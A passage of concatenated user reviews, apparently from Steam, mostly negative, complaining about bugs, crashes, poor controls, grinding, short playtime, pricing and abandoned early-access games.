to play a full campaign, as the game becomes less and less stable the more you progress and save.While I would love to recommend this game, I simply can't in the state it's currently in. Some of the problems are down to personal taste, but a buggy game that doesn't save your progress is something that no one should buy.
It's like an old school flash game, only worse in almost every way.Just grab flashpoint and play Thing Thing Arena instead.
Not enough gameplay to warrant a fee. Over quickly and most of the game is waiting for your character to arrive. All answers are straight forward and dont require thought, shouldnt be branded as an old school pnc.
The basic gameplay is solid. Not spectacular but fun and entertaining.You assemble a couple of different troups, each with an unlockable special ability on top of their basic fighting capabilities. Then there is equipment for your main character which boosts the strength of your army and finally the magic skills of said main character with which you can help turn the tide of battle. The fighting is turn based.So you navigate the world map and fight battles occasionally discovering a new troop type to recruit or another piece of equipment and you could be having a good time.Sadly the developers felt the need to pad the game time with a immense amount of grinding. You want to recruit two more archers so you have the (at this time) maximum amount of 10/10 archers in your army? Well, off to the repeatable cave fight and do it 6-10 times in a row before you have the required gold.On normal difficulty this is annoying. On hard it made me hate the game.
Too simple and short. After 20 minutes you've worked through all the scenario's, you can't choose a weapon or ammunition or increase zoom. Barely credible taking out of 2 tanks running amok (spoiler, one shot from a rifle blows up the tank?). Cheap enough game, not that engaging.
SLOOOOOW game play.  Even after choosing the fast render option.  The dice throw is painfully slow and there's no way to make it go faster.  The computer opponent is sloth slow with moving the pieces.  The game of backgammon is a great game and you can play it with this game but it's a yawn of an implimentation.  Not worth $5
Suck game even tho you lunch it thru steam it says restart the Plugged Vive while you Playing without Vr ModeFIX this problem!
Edit: Now that the remastered version is out, I still can't recommend the game and IMO it is even worse than the original version.If you really really want it, it is available on a bundle with 12 other games for a merely $ 2.99 (until price rises).The remastered version lacks a lot of scenes where you would be introduced into the settings of this VN, it feeld rushed as there still are some spelling errors a proofread would have caught as they are very obvious (e,g. a uniform, your instead of you're etc).But the most weightened point why the remastered version can't be recommended is that some/a lot of scenes available in the original game were omitted in the remastered version leaving the player without much information about the story.As I played the original game it somehow made sense, but honestly a player new to the remastered version will have some difficulties getting into the story.***********************************************************************************************************Original review.After enjoying Sword of Asumi quite a bit I've been looking forward to buy this game hoping for some similar enjoyment.But boy, I was completely wrong!This game feels rushed as the plot is very shallow (so far), everything is thrown in your face without much hesitation or even creating any atmosphere.The introduction to the girls working on that resort is so quick that you do not get any impression of them. The dialogues feel clumsy and emotionless so that you click forward hoping that the next screen will bring that 'Wow!' effect, but unfortunately, it won't happen.The other downside is the very bad spelling/grammar throughout the text. It is riddled with spelling mistakes.Don't get me wrong, I am used to VNs with some spelling mistakes and I do make a fair share of spelling mistakes too, but in this game there are so many of them that it's impossible (for me) to pass over them.It seems that the text hasn't been proofread at all and that the author might not be a native speaker. The music is quite nice, but gets repetitive soon so you want to turn it off after a while.The art style is nice and well drawn and it features some cute girls.I have clocked two hours into the game so I am at the limit for asking a refund but I guess I won't do it because devs can improve on the story/dialogues for part 2 and 3 and spelling mistakes can be corrected.But at the present state I do not recommend to buy this game.
Like another review said, if you've played some of the other Sakura games, you've played this one. There's nothing particularly innovative about this installment in the series. It took me around 2 hours to get all three endings.
It could have been a cute little game, but the combination of the normal complaints (difficulty finding objects, puzzles (all skipable) not making sense, hard to see which areas are searchable) along with it being difficult to see what changed after puzzles, not being able to pickup items you don't have the quest for while some items are just fiddly to click on, and quests not showing when you click one again and also not showing when you're not allowed to do them yet, gave me a feeling of a frustrating lack of progression all throughout the game. The puzzle for the hint system was cute, but long enough that I was unable to spam hints after I lost interest. The story was... I would have prefered just the game.
It's games like these I wish Steam had a neutral option. The good: Gameplay is very fluid, all inputs seem to register perfectly, which is great in a platformer. A lot of the level design is very good.Music is good, though repetitive. Spaceship levels help vary things up.The Bad: Life system is pointless at the best of times, incredibly pointless at the worst. While gun powerups are fun, they're reset on death which makes future attempts annoying.Horrid controller support, the menus appear impossible to navigate, as well as the game over screen, which means returning to the keyboard at least 15 times to finish the game.Some environment hazards deal half a heart of damage, some deal a full heart, and some instantly kill you with no real indicator of what does what. Walls you can jump off of have similar issues.Now for nitpicks: Ammo is not reset on death. This led to an annoying section during the final boss, where I died with no bullets. Because bullets are required to break the boxes containing more ammo and health, the fight was nearly impossible without exiting to menu and coming back.Horizontal inputs for the level select menu register as two pushes, so selecting an even numbered level on a 5x5 grid can be very hard, unless you use the mouse.Jumping up into invisible death plains for previous sections of the level is possible.Health pickup sound effect is a blatantly stolen 1-UP effect from Super Mario Bros.
I was so surprised. This would be a poor investment for an Early Access game. No tutorial, which is fine if there were at least tool tips. Gameplay is bland, unbalanced, and poorly explained (How in the world does one charge?). Poor dialogue, lots of errors, etc. The issues compound, wait for .99 sale in a few years.
Listen to the other negative reviews. We've been waiting years for gateway 3 and it was a total letdown. The gamr slows down after an hour of playing and you can easily softlock yourself with how many glitches there are. The developer has ignored all my tweets to them about bugs. I just wanted this game to succeed but it's lazy, expensive, and feels like a copycat of the original 2 games.
While the general game is fun. It seems that the only way the Dev's have designed the game to be more challenging is simply to give the game a dice roll advantage. Seeing that the rate of the game rolling the best possible roll for its turn, is way beyond that of the player. I also started to make note of how often the game rolled 0 on all four dice, vs my rolls. And the game didn't seem to roll more then 2 times in a row. Vs my highest of 4 times in a row. Simply put, it not a real test of skill playing against this game. It's more a case of, as long as you don't totally fumble the good moves you get, you'll beat it. But hey, not to bash to much on the Dev's. After all you get what you pay for, right!
I really hate to change my review. I actually wrote a long review talking about how much I like this game, and how good it is. But it has been months upon months and the developer has not released any new content, nor has he made any sort of announcement. It's with a heavy heart that I have to warn you to not buy this game. It has been abandoned. But I will say this: The amount of content currently in the game will get you a good 5 hours of entertainment. If you have someone to play local multiplayer with, then it may be worth it for you to buy this game. But if you want this expecting online, don't. It was abandoned before that feature was implemented. It's such a shame. This game had so much charm. Awesome retro graphics. Simple controls. The whole package.
Cookie Clicker-esque. It's not hard on the computer but neither is it entirely gripping, at least for me. Graphics are somewhat decent, though I spent most of my time too zoomed out to really appreciate all the details. Some of the planet effects were unclear to me at first and it took a bit of trial and error to play. The one thing that was really the dealbreaker for me was the achievements. Once you hit level 26, you've pretty much done all but one achievement, and that means waiting until you reach level 40-something - something I really didn't want to spend even more time on seeing as the game is only active if it's the window at the forefront. Exp scaling past level 30 is abysmally slow and that's what really turned me off the game. Nice try though!
I cannot recommend rymdkapsel for the majority of people. It's laid back, but the waves of enemies coming faster and faster ensures it's never relaxing. The way you direct your units to build, gather resources, etc, is very intuitive but often fails when it comes to prioritizing tasks. There seems nothing you can do to spice up runs outside of the monoliths your units can research, of which there are only 4. Even the pacing of the game becomes aggravating after more than a few plays due to the complete lack of any ability to speed up time.In short, rymdkapsel is an absurdly shallow strategy experience that plays like an experiment someone put up for sale before finishing.
no
This game is garbage. I bought it for my daughter and shes having trouble even playing the first mission. There are no instructions, the graphics are horrible, and the gameplay is just beyond boring. Don't waste your money. No matter how much your kid begs. Thank god I bought it on PC and only wasted $20 instead of $30 for PS4 or $40 for Switch. Wouldn't get this pile again if it was free.
Would like it if it worked with touchscreens like it use to.
I was hoping for a game like The Binding of Isaac, but I was really disappointed. Incredible difficult, no rewarding moments spoil the fun.Things that are really bad are, that you autocomplete the levels, even if there is still gold or weapons. Then your hitpoints count for ♥♥♥♥, as almost all enemies hit you so fast that you insta die. Not to mention that your most effective weapon - the blue bubbles - damage you as well.
I'll start off by saying that I (kind of) liked this game and it was (somewhat) fun but there simply isn't enough replay value to justify the price.  If it was half as expensive it'd be a good deal.  If they were to expand on the gunplay and enable some multiplayer or even just add more wave type shooting, I would happily recommend this.  However, it's currently a glorified demo.  You're literally paying $3.00 to play an adviertisement.For now, if you have the extra money and want to try it out.. I guess do it?  Just understand you'll get all the gameplay you want out of it the first go around.  - 6/10 -  Would not pay for an advertisement "demo" game again.
Turned me into a discord mod
Saw a big skull with green glowing eyes.Sailed towards it.Followed a huge 30 minute fight ending in a pretty hard boss.Loot for DAYS! Hauling it took over 30 minutes again.Sailed to the closes port.Enemy players.Sailed quickly away.Ship stopped."Why don't we move?""I don't know."Kraken.Fought off Kraken.Finally arrived at a different port.Time to sell all those goodies and literally double our money we made in the first 20 hours of the game."Connection error has occured."Srsly, ♥♥♥♥ this game. It's great in so many ways, but the connection problems are omnipresent and quite honestly ruined one of the best in-game stories I've ever lived through.
Aquaria: the Musical!More words? Okay. It's a puzzle game about finding your way through labrynth-style caverns and dealing with various timing based boundaries as well as some enemies. It's not a bad game by any stretch but within the first hour you will have a very good idea as to whether it is "your jam". The artwork is absolutely sublime but the gameplay is excessively repetitive and the controls can be quite unwieldy at times. The vehicle sections are particularly obnoxious but are thankfully beaten by force alone.I would not buy this game on it's own. If it's in a bundle or extremely cheap on sale and it sounds appealing then you should give it a shot. It's a short and unique game: with even a little bit of patience you can probably finish it in about four hours and not feel robbed.
Buggy piece of ♥♥♥♥ doesn't quite cover it. The game music models and rendering is solid, but sometimes it lock up unpredictably or crashes all together, this is game breaking sometimes during the fast paced running segments.The game fails to break itself up sufficiently between the farming side and the military side i played for a solid hour just doing the repetitive jumping puzzles because either the game lags and you find yourself trapped into an unwinable position,or it completely crashes.All i wanted to be doing was harvesting and planting my crops to gain coins to progress.It then turns out at the end that you never even get to finish your farm.once the military levels are complete the game deletes your save game and then returns you to the main menu.2/5 but only for the very limited farming side
Please fix the controller support. It's terrible. I'm using an Xbox 360 controller. It's the de-facto controller for use on PC's, and it doesn't work with your game or even with the help of Steam's magical controller configuration. I hate using a keyboard and mouse for games, and it's extra terrible in a platformer. I had to request a refund, which is very unfortunate because of the scarcity of quality 3D-action platformers. I'd love to repurchase this if the controller issue is fixed and works well. On a positive note, the game seems to perform very well in Linux with Steam Play. I would love to see a Linux-native version.
Broken and awful.... where are all these positive reviews coming from?
no
Disclaimer: I am a real life ping pong playerThis was not what I expected. I play a lot of real life ping pong and was excited to be able to play at home. This isn't anything like the real game. I had to dramatically change my style. The spins don't register as well.Summary: If you are a real life ping pong player, you won't enjoy this.UPDATE: It looks like this review garnered a lot of attention and maybe criticism due to its short amount of words.Let me be clear of my expectations: I bought this game because I love ping pong. This game isn't being advertised as some futuristic pong like game like Holoball. The picture literally says "table tennis simulator," so the game should simulate playing ping pong. Did it correctly simulate table tennis? NO. It's nowhere close to being the real thing and doesn't deserve to be called a "table tennis simulator."
This game is more about trick jumps and landings more than anything. It's a fine platformer but a weak puzzle game.
Up and down does not work, no controllet support, really not very well made scroller.
CS:GO IN 2D WOWDon't waste 1,99€ (2$~) and go play Miniclip.comThis game is a troll.
This game gives me anger issues when i can't complete a level. And doing that over and over again is not good for your health. If you like having anger issues get the game.
Being a chess fan, I really like the idea behind this game and its mechanics. It is a wonderfully innovative take on the FPS genre. In addition, I quite like the sparse graphics and sound -- while many might consider them lame, I consider them to be sleek and clean, not unlike chess itself.However, it is terribly, WILDY under/over tuned. That is to say: whereas you have to work hard not to win in training mode (making it ideal for learning the controls and aiming), "normal" mode is ridiculously difficult. There are three reasons for the insane difficulty:1) The other entities rarely attack each other. But if YOU attack an entity, typically expending energy in the process, any nearby entities target you in your weakened state, even if you didn't hit the opportunistic entity with splash damage!2) Even if you manage to engage an entity in complete isolation, it recovers from being stunned very quickly.3) Other entities do not have any problems instantaneously targeting your energy globe when you are stunned. But even if you manage to try to start draining a stunned entity before 1) or 2), it often takes time for the entity to roll such that their base and grill work are not protecting the energy globe! By then the entity has recovered (or the other entities take note) and 1-shot you.Consider this: at the time of writing this review, the most players that had managed to beat at least one map in the entire world (according to the leaderboard) was 15. Most of the maps had the same 3-6 entries on the leaderboard.In conclusion, I really, really want to like this game. And indeed, there is something therapeutic about just gliding around these wonderful maps picking up energy motes. I will continue to fiddle with it from time to time, simply because I paid for it. But the reality is that gliding around too afraid to do anything -- because of the near-insta-gibbing that inevitably follows -- gets old fast. Clearly it is possible to succeed; the leaderboards prove it. But I cannot recommend this game as-is, and certainly not for its price given the huge selection of entertainments available on Steam for the same or less.
Don't buy this game.Cons : - Bugs- Crashes- 30 mins of gameplay- just BOORRIINNGGG- You just buy games with 2 secs of bugged gameplay and click for more money. Nothing morePro:- Expectations
worst physics i ever seen
Does not work. Black screen on Win 7, GTX 970. No discussions on how to fix...
to hard and faster Zuma clone.
I tried, and it's... meh. Concept seemed good at the time but in the end I feel no sense of progression. Plus, some stages really feel random...
very bad game. the game require a lot of fixes
i just downloaded the game Flowscape and the game crashes all the time, i even can't open it, it crashes just ater loading, and the loading is extremly longi tried" high" and "med" settings, no changei really like to play with this fantastic game but i can't !!!!Error message : "fermez les programmes pour éviter de perdre les données . La mémoire de votre ordinateur est insuffisante. Fermez ce programme : Flowscape.exe"my config :Windows 7 64bitsIntel core i7-2600 3.40ghz16Gb RAMSSD CrucialNVIDIA 660 GTX 2gB drivers updatedi tried again several times : it make also crash my PC and the screen is black, i have to ctrl+alt+supp to rebootthe crashes are random, because one time and only one time, i entered the home screen with success..this is a nightmare, i never had such problems,my config is ok for many games, never crash
This game should be named "Unlucky Panda n Player" anyway...Kinda difficult even for kids...N about Steam Trading Cards? Its a trap ♥♥♥♥♥♥♥♥♥♥♥♥...
I was very looking forward to play this game. I was expecting it to be dialogue-oriented instead of gameplay mechanics etc. and I was ok with it, I was just curious about the story. In the first 1/3 of the game I was bored as hell, the dialogues were cheesy as hell, no way that a person who just found themselves in what they would describe as "limbo" would react so calm like that. Even if they would, the conversations that the girl had with the dead people were superficial as hell. When they introduced plants and animals into the mix is where I kind of started to like the game. I thought, this game delivers some strong messages like "every living thing on Earth is precious" or "although we assume that plants and animals don't have free will, they do and they communicate with each other AND us" and it was really heartwarming that somebody else has thought the same and wanted to make a game about it. SO I THOUGHT. The ending of the game was one of the most disappointing endings of all time. Evertyhing the main character Vivi had experienced in the "afterlife train" has led to her deciding to take care of some kittens. And that's it. No other message, not "love your family" not "be kind to every living being" whatsoever. We don't get to see the change of character in Vivi and that's the main reason I'm refunding this game. I'm assuming that this is a memory of one of the makers of this game who fell asleep and saw that they needed to adopt kittens in their dream. It's that simple. I'm sorry. The artwork is great, but that doesn't make a game "good". It was a bad game and a waste of my time.
After playing the first game and enjoying it, I hoped for more in the second. Perhaps it was just me, but I felt they failed to recreate any of the wonder of the first game.
HEAR ME OUT: Gave this game benefit of the doubt because I wanted to test out if this would be a good game to suggest to my friends. BUT if you want me to get my friends to play this game. I would like to suggest. 1. mini tutorial on the controls. OR  show the controls on the screen please.2. using shift e to throw the item is kind of awkward, maybe 'F' key?. OR 3. Allow us players to customize our keys.4. Single player doesn't work. I see there is another character there but there is no indicator key to switch to that person, after seeing another review say the button to switch was Tab, was still difficult to play.5. For single player the blocks move a little too fast on the conveyor, running back and forth throwing. I lose more points than earning (possibly an easy, medium, hard levels in the future?).6. The layout design concept of the game is simple, easy to navigate through, which I appreciate so please keep that for the future. 7. Possibility of having more than just 2 co-op players. Maybe 4? handling one color each or two colors each. who knows just some ideas8. having controller compatibility?Overall I still want to give this game a chance. The idea of the game and it's co-op mechanics is simple enough to recommend to many of my friends. Been looking for co-op games and this one really has potential , however still needs major improvements. For a single developer / indie game its really well made. Obviously the game still needs time to be worked on.I will change my review when I see the next major update. and as well give that update a fresh start for the game.
With the vive, eventually I got to a point where I cannot advance. This is the end of the first set of rooms. I can't click on anything to advanced the story.
The Dreamatorium of Dr. Magnus 2 is a hidden object game that leads you to solve a mystery. I normally like hidden object puzzles, but I was rather disappointed with the story and the mechanics of this one. There were times when the next steps weren't clear, and I wasn't a fan of the narrators voice or pace of storytelling. I give it 6/10.
Its a decent game, decently polished and no real bugs aside from the music turning itself up over and over. Problem is if you are past the honeymoon period of the VIVE, this game will leave you empty. It is interesting for probably 30 minutes then becomes quite boring, it needs something more to its gameplay for the wow factor. A decent title but not worth $16, there are better titles out there with more replay value.
I like the idea and the story, but there's really not much of "game"ing going on. I got it on discount, but even with that, it feels like I paid a lot for just about 40 minutes of okay-ish gameplay. It could be a fun experience if it was longer and if it had more things to do, except that "work hard simulator" and "find the dialogues" challenges. It could be so good--sad that the developers were fine with mediocre.
This is one I'd wait for, it's often free, so don't pay for it. Also a fantastic showcase as to why Steam reviews need a damn "maybe" option already. It's a decent game, but it lacks a lot of polish, especially in the bosses. Difficulty spikes, unresponsive jumping, for some reason Kao's voice actor was changed for this release so he's no longer got a cute little Aussie voice but instead sounds more like generic-early-2000s-mascot... I don't know, it's hard to recommend, especially with so many other far better 3D platformers available on PC. Hell, Kao 2 is pretty much just Rayman 2 but with a way lower budget and far less polish.
This game was a good time killer and was an ok game for the sale price when I got it. The main reason Im going to give this game a bad review is there are very basic problems they could fix and should not exist. some examples areMP points to unlock ships is wrongSome achievements are out of syncAsteroids explode into bigger asteroids If these issues did not exist the game would be a "ok game" and worth the cost 
I played for about a quarter of an hour, and I found it enjoyable.  But then I had to leave and I found out that there was no button for QUIT.  I can do with minimal help, but I want to be able to quit when I have to go (I have a life, after all).  Pressing the ESC did not help.  I had to use the task manager to close it.I am getting a bit fed up with developers who have no respect for the users.  I have already said my piece about those who do not include skip buttons in the minigames - due that there are minigames that not all of us are good at, but not allowing the user to quit when he/she wants assumes that the user has nothing better to do with his/her time than play the game.Newsflash, you lazy developers.  WE have a life.  WE have responsabilities.  We have  appointments.  We do nnot wish to be tied indefinitively to the computer until  we solved all the puzzles.I should not complain because I got it real cheap, but if put this up maybe the developers will create something that people will want to buy
Really unbalanced, for the most part I can play on the most difficult setting, but for some levels have to turn it halfway down, there's too many difficulty settings, it should be kept simple at maybe 2 or 3. I'm sick of changing the difficulty level down by one because it's impossible to beat a boss, and then it becomes too easy and I'm sitting there staring at the screen for 2 minutes waiting for the time to run out. If this game was more balance I would probably complete it. I don't recommend it at this stage because most levels are too easy even when on the most hardest level.
Not very good!Most of the art is great but very repetitious.  The controls are close but not quite tight enough. There are only 5 levels, each taking about 30 mins to fumble your way though the first time, 3 minutes if you are going for a speed replay.Poor level design and the odd choice to let you choose any weapon at any time takes away any sense of progression and makes the whole thing seems pointless. If they limited weapons to certain situations at least it could feel strategic, like an action puzzler. Good music but again pretty repetitious.
Half of the maps/races are ♥♥♥♥♥♥ and don't work. Very cheap game, if you have a low end PC it might be a good time waster. Might be better to get My Car instead of this.
Aweful controls.Crappy physics.
This was a tough review to write, but I'm gonna have to give this one a thumbs down. This game is more challenging than fun, which for some people is a positive thing. I was hoping for a more relaxing experience with this game, as it offered a very surreal, and artistic background. However, this game is not for the casual gamer, as the tracks are unforgiving. After two hours of gameplay, I found myself increasingly frustrated with constant crashing, and falling off of the track despite improving my technique. It can be difficult to zone out, and casually play this game, which for me, crushes its novelty. This is a good game, but not for the reasons I bought it for. I'll probably play it very rarely now.
If you're thinking of buying this because it reminds you of Crossbows and Catapults... or because it looks like fun... You'd be wrong.  On both accounts.  I purchased this on a whim because of what I wanted it to be, and ignored the many accurate reviews telling me what it actually was.  Don't do the same.  If a developer reads this and cares - I'd love to help you "fix" this... because the idea is really cool.
This game feels like a very poor and low quality rip-off of the other VR Gun Simulator  HotDogs, Horseshoes, and Hand Grenades.  It feels fery buggy, slow, and clunky compared to it. This game does have potential, but as of now, it is nowhere near where it could be, not worth the $19.99 price tag. As of now, I recommend the other VR Gun Simulator.
I don't enjoy the timed puzzle aspect.  I prefer to mellow and relax with a puzzle.I also didn't like the way the pieces are fed.  It is a puzzle game that only shows about five pieces at a time.  Whether or not there is a way to reason where those pieces should go appears to be totally random.  I prefer puzzles that show all the pieces at once and then I work out how to place them based on reason.
I bought this game as a joke because I love osu!mania and Stepmania and Thought it would be funny to buy this game but it was so bad that it wasn't even worth the $2 I spent. So devs, if you are reading this and wish to improve this game, please at least look at Stepmania for inspiration because as crappy as this game is it wouldn't be bad to have a REAL rhythm game on steam
There's some interesting stuff here. I'd love to see more of it. But it's SO. DANG. SLOW. I spent minutes at a time waiting around for the 'zen' currency to build up enough to even do anything. There's an expensive item that increases zen production, but just the thought of waiting long enough to save up the cost made me bored. There's nothing to do but stalk your citizens looking for satanists while waiting, and that gets old pretty fast. I'm seriously stunned that there's no fast forward setting.
Recommended : No (run you fools)[+]Music[-]Severely repetitiveRessource required to upgrade weapon extremely rareNot fun to playGame build very fast to get money
I hope the developer knew i only bought this because badgers are in it
Awful game, it's obvious the top comment from "TheDrunkenPuppet" is either working with the team or just friends with them. Only good reviews are from people who got the game VIA steam key which is pretty sketchy. This game needs to be removed from the steam store ASAP and needs to be worked on SO much more before it's in Early Access.
looks like this game's...not so legendary
Did I pay for this? I hope not, because for a text based adventure, the writing is poor. Maybe it's translated from another language, but it's about as bad as leaving a color blind person in charge of graphics for a game. I had to click next for almost 3 minutes to finally get to a point where I got to make a choice. Not very exciting. It's filled with bad stereotypes, cliche writing, and honestly feels like a game that came out in 1987 that got a new face-lift. Well, maybe a homebrew game from 1987. Publishers tended to have a better handle on game they released than this crap monster.
Game servers are dead and since there are no players there is literally no game, you can't do anything besides mess with the menu and make an avatar.
Very generic platformer. Story is very minimal. Camera and combat is awful. You have to do a ton of repetitive grinding for crystals and resources to build up the town but it never adds up to anything besides small visual changes. You get these outfits but they don't add new gameplay elements besides doing a specific set gimmick. There are many better platformers out there 5.5/10.
Nice flow up until the knee-kissing scene. I just had to stop reading since, truthly, I get angry when flow doesn't feel right. The lack of progress in that scene just doesn't sit well with me. Fuba wants to know what Seri is hiding, but just stays complacent. This makes the story's flow feel random. The story was going fast, until it screeched to a halt; like, going from one end of the gears in a manual car to the other end. It doesn't feel nice. If the story went at a slower pace or had better flow-variation (being more elegant when changing gears), the scene may have suited, and overall the experience would have been better.It didn't help that the language was confusing, in that the scene made it hard to understand what both characters were doing and what they desired.
not recommendedthe creators did not deliver what was originally described on the gofund me page for this game, as it turned out it was just a walking similator doing chores around a house with inner monologue. as the original description for the game insinuated that you play a key role in Espionage being the house keeper."It's 1972 and a military coup has rocked Anchuria, a small country in Latin America. As a result, you, Angela Burnes, US citizen, are trapped in the metropolitan capital of San Bavón. Your paradise has turned into a warzone. To make ends meet, you take up a job as a housekeeper. Every week, an hour before sunset, you clean the swanky bachelor pad of the wealthy Gabriel Ortega. You are given a number of tasks to do, but the temptation to go through his stuff is irresistible. And what is he up to? As you get to know your mysterious absent employer better, you are sucked into a rebellious plot against the notorious dictator who rules the country with an iron fist." but  sadly it had no intresting plot elements just boring inner monologue of the character while doing errands, so imagine "papers please" about just doing paper work and no other plot points about helping the resistance etci personally had high hopes for the small indie dev and as a fan of thier previous works like THE PATH, LUXURIA SUPERBIA,but sunset was a let down
It would honestly be a fine game if your progress didn't reset every time you closed the game.
I got this game as part of some bundle and finally gave it a try.  Well, first off, I am a casual gamer and I don't mind if the game is simple or doesn't have state-of-the-art graphics and sound/music.   But this game is practically a joke, sorry to say.  I found gameplay just unimaginative and not fun, basically silly looking creatures in 2D that made me want to laugh, cringe or cry - or all three.  This is my first review of a game on Steam and I'm doing so in hopes of saving someone their money for something better.
It was a nice board game that I probably would enjoy in real life, but in 3 hours I learned it and beat all the ai and since I don't care for online, there's nothing left.Could have used a sort of campaign mode like the Catan adaptation had, because now there isn't a reason to play, and 12$ for 3 hours isn't really worth it.
       I think mine is broken, I'll just say that right off the bat.        First of all, I have completed all of the game that I can(physically, all the other levels are locked), and it was mind-numbingly boring.        There is no uniqueness, it is exactly like any number of free flash games you could find online. the only obstacles you find are red sticks and the edge of the screen. there is no replayability, because all of the completed levels are locked. And lastly, this isn't even a puzzle game! In my mind, any puzzle game should have an element of story, a few original obstacles, a way to actually play the game, and something to put thought into. This is a skill game. A bad skill game. The gameplay is based around waiting until a ball swings around a hoop, and clicking at the exact right moment so that said ball hits a purple globe.        I realize that this is a unity flash game, and it is indie developed, and that by writing this I am hating on one individual struggling to make ends meet selling steam games, but all that does not change the fact that until this game is fixed, it is a crime to sell it for nintey-nine cents.
new game from kingdoms rise dev, beware.
Not recommending this game solely because although it says "Tracked motion controllers", the game is 100% head-tracked, and it only uses the triggers primarily. Although the head tracking is pretty great, definitely not what I went in expecting. All that being said, it is a very fun game! The head tracking is spot on, and does make sense for the setting. It also looks pretty great. One minor issue I had was the intro cutscene gave me my first disorienting VR experience. When it went through the tiny spaceship compartments, that set off a bit of my claustrophobia as well, which was somewhat unsettling, but that doesn't last very long. To the devs: I'd recommend reevaluating the current intro scene. Give us some frame of reference, a ship or suit at least.
Lovely claymation-looking graphics and kind of unique concept but I would prefer it with everything focused without the annoying blur on things without the mouse pointer over them
For me this is too difficult even on the easy level.The other TD games from the same package are anywhere from super easy to manageable.
Very buggy. Had several times I won or it was a push and my funds were taken away. No ability to move everything to fit my VR space and the help and credits buttons do nothing. Dont waste your money. Its not even close to being finished.
Very basic. There are a lot of free clickers that offer way more complicated and satysfying experience.
IT IS A BAD GAME! you should not get it is not even worth a dollar! I got bored of it right away (5 minutes!)
bad geim
The concept is brilliant, and it is a great effort at something new, but it sadly falls a little short of being fun to play.You are given the power of Athena, controlling wind and currents in the ocean, but the captions of the ship all seen to have a death wish and would rather break free of a current to run aground some rocks or a sandbar. It all feels like it could have been so much more than it is. Once you get a few levels in, and you are nudging ships through narrow spaces, triggering levers to open gates across the sea, while cyclops stand on the shore and throw boulders at your ships for fun, I had to stop playing. I wanted to be the cyclops more than have the buggy powers of a goddess. I commend the developer for a fresh idea, and I hope he makes a more polished sequel. For now, I cannot recommend this game unless you are curious about the concept, and then only when it's on sale.
The game is technically fine. The story is fine, though told in a very disorganized way. The "games" feel very much like lazily inserted busywork to make the play time slightly longer. It's basically a series of short stories pasted together with the excuse that these very different ladies were friends for a minute. It is most certainly NOT worth whatever they are charging for it. Had I known how short it was, I would not have paid more than five dollars for this game and it honestly isn't even worth that. I've played better games in terms of both storytelling and game play in the free content.
Can you battle against all odds and refund the 79p?
Update 9/9/2015Thanks to @Anonymous2012 for commenting and bringing to my attention that this game is being canceled to start a new project.Seriously.Also, it seems that Fivang was allowed to remove the game from early access and it's now listed as a finished product? Steam really needs to get their ♥♥♥♥ together. The fact that this "developer" has backed off this project now twice, thinks they will go onto a new project, and is saying this is a finished project is beyond comprehension. Fivang should be blacklisted from Steam. This is a joke.Update:So I went back to check in on Quest Event again since the vocal minority decided to question this review.Let me preface this by saying, at the time of the Original Review there was no gameplay. A developer that abandoned the project 2 years before hitting steam. And is now adding content. So with that said, I stand by my original review. This game is still way to early in any shape or form of development to be on Steam or the Early Access program. Adding an additional zone and implementing skills that seem to have no point (Woodcutting, Firemaking?) then using them as a means to start a new quest makes no sense.The developer removed the original highly offensive One Hour timer to start the Bandit Quest 2 and replaced it with an equally impossible challenge. Get firemaking to level 15. Now I lit every fire I could find and was level 5. I'm assuming that these fires will go out eventually. However, I don't plan to find out. This is still a joke and should be free. If the developer actually wanted to make a game via Early Access then they should do that without charging. *******************************************************************************************************************First, Don't purchase this game. Read this review then continue to not purchase it.So I purchased this piece of garbage yesterday on steam. Quest Event is an RPGmaker "game" with no original assets and a funny story to go along with  it.I tend not to look into the games to deeply before hand, considering I want to review them without any real background of it. I generally don't play RPGmaker games but considering only one other game had come out which unfortunately is local multiplayer, I opted to check out this one to do a new review. After installing the game it didn't launch. Couldn't find an executable. Awesome start. So I check the forums to find someone had already broken down the back story of this "game".They had gone to the website and found the game was said to have been canceled in 2013...They also found that there hadn't been an update on the greenlight page or their website since the same time. Now, fast forward to this morning.I log into steam to check out if the developer had mentioned anything. Nope.Instead, he had deleted all the negative comments and questions. Then someone posted them again and they were then moved to the "other" page. The developer did respond saying that "Since it was greenlit they decided to charge 4.99 then 14.99 on release." Now this is a game that hasn't been looked at since 2013. How do I know? Because the developer also announced that he uploaded the new game files so the game would work. OH JOY! So I just got done checking it out. This build of the game is the exact same build that was added to the greenlight page almost 18 months ago. Cool story, so you're charging for something that is dead. Neat, thanks for that Steam.Now the best part is. I played it. It's a short tutorial. A couple quests and shops. Then you get to a woman and she says to come back in an hour. ITS A LITERAL HOUR! A timer shows up at the top of the screen, counting down, in real time...Seriously, an actual hour. I think that sums it up.Don't buy this. Tell your friends not to but this. Don't buy whatever next game they think they're going to make.https://youtu.be/X1HhLykWWWwFor more Reviews check out http://www.EarlyAccessMedia.com, http://www.EarlyAccessPodcast.com and http://www.youtube.com/EarlyAccessPodcast
This isn't what you hope to get out of an archery game.  You want to take long or medium range accuracy shots, but all that ever ends up happening is about 15 monsters running directly at you, then surrounding you, and you survive by shooting arrows as quickly as possible at the creatures 2 feet away from you requiring no accuracy whatsoever.  I didn't find this fun AT ALL.
There is no option menu, so you cant mute sounds, which is music so innoying. And there is some perspetcive problems accurs i think. 
Despite being a small and cute indie game it's too slow-paced, repetitive and monotonous.The problem is how to move around the map. The maps became larger, but the gameplay on them does not change from the first time, you just repeat the same thing over and over again, with no special abilities or obstacles to make movement less monotonous.
This game Is extremely close to being fun, but then it spits in your face.When you die in the dungeon you do not get anything for your troubles. No experience, no loot, nothing. This wouldn't be so bad except every single encounter is insanely difficult and once you decide to go to the next encounter you can't leave with your loot, so you never know if you are wasting your time.The game is clearly extremely short and took an old school aproach of lengthening it by making it way too difficult, but it isn't fun
Get it on sale for 90% off otherwise don't bother. This game is boring, feels utterly clunky, and has had no updates or care given to it since 2016. The combat is bad, upgrades do nothing (got an upgrade to a Basic Sword but it still takes 2 hits on the armored enemies to kill them...so what was the point exactly?), gems do nothing (no store to unlock abilities), and the levels devoid of anything to make them interesting (traps, meaningful puzzles, boss fights that weren't gotchas until you figure out the mechanic that hadn't been explained or telegraphed well at all).Avoid unless on sale for $&lt;1; even then, save your money
There isn't much to this game. No trading cards, no steam achievements, and all you can do in-game is care for your horse and so training or speed trials. There is no open world or free-roam option or a chance to finish quests. You can see everything in under an hour. I wouldn't reccommend this game except your younger (under 14) players.
I can't move when the time in the 1st world in story
